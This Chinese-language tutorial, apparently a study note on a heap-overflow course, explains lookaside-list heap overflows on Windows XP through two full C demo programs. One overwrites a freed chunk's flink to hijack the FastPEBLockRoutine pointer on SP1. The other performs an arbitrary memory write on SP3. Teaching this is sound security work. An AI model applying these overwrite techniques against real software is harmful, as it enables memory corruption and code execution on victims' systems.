0x00 概述
本文从程序实例出发,展示了XP SP1下的堆溢出+代码执行,XP SP3下的堆溢出+内存任意写,主要面向{已经掌握缓冲区溢出原理,希望进一步了解堆溢出原理的初学者}、{就是想找个堆溢出例子跑一遍的安全爱好者}以及{跑不通各种堆溢出书籍示例代码、非得跑通代码才看的进去书的搜索者}
按照代码阅读者视角 整理了讲解思路。
0x01 测试代码环境
虚拟机: VirtualBox 操作系统: Windows XP sp1 编译器: VC++ 6.0 调试工具: 看雪OllyICE
其中,Windows XP 只能是sp1,因为sp2之后需要绕过其溢出保护机制 会使文章更加复杂。
如果您想要寻找xp sp3 下的内存任意写实例,请跳转0x09。
0x02 测试代码步骤
安装Windows XP sp1 注意,网上有很多sp2 不知什么目的写成是sp1,下面是真正的sp1 http://pan.baidu.com/share/link?shareid=371613660&uk=1865555701&fid=2361791550
下载VC++ 6.0 绿色版 http://pan.baidu.com/s/1kTLqYnd 解压后运行sin.bat
下载代码工程 http://pan.baidu.com/s/1kT5HRNp
或者拷贝文中代码 自己新建工程
#!cpp /* Overwriting a chunk on the lookaside example */ #include <stdio.h> #include <windows.h> void print() { printf("/nHello/n"); } int main(int argc,char *argv[]) { char *a,*b,*c; long *hHeap; char buf[10]; printf("----------------------------/n"); printf("Overwrite a chunk on the lookaside/n"); printf("Heap demonstration/n"); printf("----------------------------/n"); // create the heap hHeap = HeapCreate(0x00040000,0,0); printf("/n(+) Creating a heap at: 0x00%xh/n",hHeap); printf("(+) Allocating chunk A/n"); // allocate the first chunk of size N (&lt;0x3F8 bytes) a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); printf("(+) Allocating chunk B/n"); // allocate the second chunk of size N (&lt;0x3F8 bytes) b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); printf("(+) Chunk A=0x00%x/n(+) Chunk B=0x00%x/n",a,b); printf("(+) Freeing chunk B to the lookaside/n"); // Freeing of chunk B: the chunk gets referenced to the lookaside list HeapFree(hHeap,0,b); // set software bp //__asm__("int $0x3"); printf("(+) Now overflow chunk A:/n"); // The overflow occurs in chunk A: we can manipulate chunk B's Flink // PEB lock routine for testing purposes // 16 bytes for size, 8 bytes for header and 4 bytes for the flink strcpy(a,"XXXXXXXXXXXXXXXXAAAABBBB/x20/xf0/xfd/x7f"); // strcpy(a,"XXXXXXXXXXXXXXXXAAAABBBBDDDD"); //gets(a); // set software bp //__asm__("int $0x3"); printf("(+) Allocating chunk B/n"); // A chunk of block size N is allocated (C). Our fake pointer is returned // from the lookaside list. b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); printf("(+) Allocating chunk C/n"); // set software bp // __asm__("int $0x3"); // A second chunk of size N is allocated: our fake pointer is returned c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); printf("(+) Chunk A=0x00%x/n(+)Chunk B=0x00%x/n(+) Chunk C=0x00%x/n",a,b,c); // A copy operation from a controlled input to this buffer occurs: these // bytes are written to our chosen location // insert shellcode here printf("%x",print); memcpy(c,"/x00/x10/x40/x00",4); // set software bp //_asm int 0x3; exit(0); }
#!cpp memcpy(c,"/x00/x10/x40/x00",4);
#!cpp memcpy(c,"/x05/x10/x40/x00",4);
0x03 溢出的位置
#!cpp a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);
#!cpp strcpy(a,"XXXXXXXXXXXXXXXXAAAABBBB/x20/xf0/xfd/x7f");
0x04 溢出前发生了什么
#!cpp HeapFree(hHeap,0,b);
把b free掉,然后b就会被放到lookaside list备用。
0x05 溢出后覆盖了什么
覆盖了b的freelist chunk结构。
0x06 溢出后发生了什么
#!cpp printf("(+) Allocating chunk B/n"); // A chunk of block size N is allocated (C). Our fake pointer is returned // from the lookaside list. b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); printf("(+) Allocating chunk C/n"); // set software bp // __asm__("int $0x3"); // A second chunk of size N is allocated: our fake pointer is returned c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); printf("(+) Chunk A=0x00%x/n(+)Chunk B=0x00%x/n(+) Chunk C=0x00%x/n",a,b,c);
先是从lookaside取回b (flink已经被覆盖了),然后再去分配c ,于是c被分配到了b的flink即我们的虚假指针处,之后就可以实现内存任意写了(写进c的内容就是写进虚假指针)
0x07 虚假指针指向什么地方
0x7FFDF000 指向 FastPEBLockRoutine() 地址指针 (XP SP1) 我们覆盖这个地址,这样一旦触发异常,就会去call 这个地址。
0x08 为什么非要XP SP1才能运行以上代码
0x09 我就是要在XP SP3下跑代码,我不想下载SP1
那就用如下代码吧,不过就没法FastPEBLockRoutine()随意call 了
#!cpp /* Overwriting a chunk on the lookaside example */ #include &lt;stdio.h&gt; #include &lt;windows.h&gt; int main(int argc,char *argv[]) { char str[]="/nHello123456789213456789/n"; char *a,*b,*c; long *hHeap; char buf[10]; printf("----------------------------/n"); printf("Overwrite a chunk on the lookaside/n"); printf("Heap demonstration/n"); printf("----------------------------/n"); // create the heap hHeap = HeapCreate(0x00040000,0,0); printf("/n(+) Creating a heap at: 0x00%xh/n",hHeap); printf("(+) Allocating chunk A/n"); // allocate the first chunk of size N (&lt;0x3F8 bytes) a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); printf("(+) Allocating chunk B/n"); // allocate the second chunk of size N (&lt;0x3F8 bytes) b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); printf("(+) Chunk A=0x00%x/n(+) Chunk B=0x00%x/n",a,b); printf("(+) Freeing chunk B to the lookaside/n"); // Freeing of chunk B: the chunk gets referenced to the lookaside list HeapFree(hHeap,0,b); // set software bp //__asm__("int $0x3"); printf("(+) Now overflow chunk A:/n"); // The overflow occurs in chunk A: we can manipulate chunk B's Flink // PEB lock routine for testing purposes // 16 bytes for size, 8 bytes for header and 4 bytes for the flink printf("%x/n",str); printf(str); memcpy(a,"XXXXXXXXXXXXXXXXAAAABBBB/x64/xff/x12/x00",28); // strcpy(a,"XXXXXXXXXXXXXXXXAAAABBBBDDDD");0x71ac4050 //gets(a); // set software bp //__asm__("int $0x3"); printf("(+) Allocating chunk B/n"); // A chunk of block size N is allocated (C). Our fake pointer is returned // from the lookaside list. b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); printf("(+) Allocating chunk C/n"); // set software bp // __asm__("int $0x3"); // A second chunk of size N is allocated: our fake pointer is returned c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); printf("(+) Chunk A=0x00%x/n(+)Chunk B=0x00%x/n(+) Chunk C=0x00%x/n",a,b,c); // A copy operation from a controlled input to this buffer occurs: these // bytes are written to our chosen location // insert shellcode here strcpy(c,"AAAAAAAAAAAA/n"); printf(str); // set software bp //_asm int 0x3; exit(0); }
#!cpp memcpy(a,"XXXXXXXXXXXXXXXXAAAABBBB/x64/xff/x12/x00",28);
那么,这段代码展示的实际上是内存任意写(没有call anycode的利用),只是把任意内容写到了str里面,即free(b),再用str地址覆盖b的flink,然后取回b,然后分配c,c被分配到了str地址,然后向c里面写AAAAAAA,然后就写进str里面了。
0x0A 结语
个人观点:尽管看到这里读者仍然只是似懂非懂地{大致了解堆溢出的原理和过程},但是起码有了一个基本的概念,对以后深入研究其机理 奠定了兴趣基础,并且对于{只是好奇的爱好者}来说,涉猎这些也就够了。
建议有兴趣的朋友们去看看heap-overflows-for-humans-102 原文,里面有很多基础概念的讲解,本笔记仅为学习时的记录,并非严肃翻译原文。
0x0B reference